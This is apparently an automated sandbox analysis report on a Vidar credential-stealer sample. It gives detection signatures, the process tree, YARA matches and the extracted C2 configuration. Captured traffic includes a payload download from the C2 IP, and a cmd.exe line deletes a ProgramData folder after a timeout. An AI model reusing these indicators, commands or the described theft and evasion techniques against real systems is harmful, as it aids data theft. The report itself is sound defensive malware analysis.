Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1433685
MD5:	b898ced2e152060f5770f1c6337006f6
SHA1:	b607705b76412adecc350bd38994d94ca3870f5a
SHA256:	716b19201a3109a3fb15b0401cb86a9be6df726c8b3a1a1c88cefb445457966b
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Vidar

Yara detected Vidar stealer

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking computer name)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Opens network shares

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B898CED2E152060F5770F1C6337006F6)

RegAsm.exe (PID: 7440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 9028 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFBFCAFCBKFI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 9036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 9072 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

chrome.exe (PID: 7532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://796299082092352771018332050787432950295397740/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1960,i,9720651213267638284,544210953920903557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199680449169"], "Botnet": "03cea2609023d13f145ac6c5dc897112", "Version": "9.3"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x201f8:$s1: JohnDoe 0x2ef80:$s1: JohnDoe 0x201f0:$s2: HAL9TH
00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7420	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7440	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7440	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7440	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.a2b000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.a2b000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x1f3f8:$s1: JohnDoe 0x1f3f0:$s2: HAL9TH
1.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x1f3f8:$s1: JohnDoe 0x1f3f0:$s2: HAL9TH
1.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.RegAsm.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x201f8:$s1: JohnDoe 0x2ef80:$s1: JohnDoe 0x201f0:$s2: HAL9TH
0.2.file.exe.a2b000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.a2b000.1.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x1e7f8:$s1: JohnDoe 0x1e7f0:$s2: HAL9TH
0.2.file.exe.a00000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.a00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x473f8:$s1: JohnDoe 0x473f0:$s2: HAL9TH
Click to see the 5 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199680449169"], "Botnet": "03cea2609023d13f145ac6c5dc897112", "Version": "9.3"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 31%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00406252 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00406252
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004061EF CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_004061EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040825F memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	1_2_0040825F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00402420 memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	1_2_00402420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040F82E CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	1_2_0040F82E

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.210.138.105:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.242.142:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.6.204.109:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.6.204.109:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49777 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: nss3.pdb@ source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source:	Binary string: nss3.pdb source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.dr
Source:	Binary string: mozglue.pdb source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A17331 FindFirstFileExW,	0_2_00A17331
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004011D9 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	1_2_004011D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004145BC _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_004145BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00414CC7 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00414CC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040BDAF _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040BDAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00409E01 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_00409E01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00413F80 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	1_2_00413F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004093C1 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_004093C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004097DC _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_004097DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00414960 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_00414960

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0041433D _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

1_2_0041433D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199680449169

Source: global traffic

HTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 23.210.138.105 23.210.138.105
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.242.142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00404165 _EH_prolog,GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_00404165

Source: global traffic	HTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGM_-v7EGIjC59ZRJ1dYmOVgs9zYixs7a6VS3cYG9RFenPtHDW-sQCDxbcp_6fD5d67UVJ_1caB4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-29-20; NID=513=X7agUV7zOCFoOtTxTc64LhX4Q-MjgkJDCdRapncbi5H2ZgSdgy6rNw3YSVpooIKFmcT-jIEoIN13NRX1tB-DxDB3Xdzc1tLkFplO7teaHv4j_NeS6NUvkNPpO038FBGchxnYqhn57DZ8pR3F9FuYQbNLqILBBxMVGoU2A-zrMxQ
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGM_-v7EGIjCEhPLSBTrZPAY39cVYHNd6_L3Rxj8WO6tEohgLxJlwyjn4Ct7LVz-jrTx9H46727MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-29-20; NID=513=X7agUV7zOCFoOtTxTc64LhX4Q-MjgkJDCdRapncbi5H2ZgSdgy6rNw3YSVpooIKFmcT-jIEoIN13NRX1tB-DxDB3Xdzc1tLkFplO7teaHv4j_NeS6NUvkNPpO038FBGchxnYqhn57DZ8pR3F9FuYQbNLqILBBxMVGoU2A-zrMxQ
Source: global traffic	HTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RauG9dSpKm2dhpW&MD=978uZbzx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
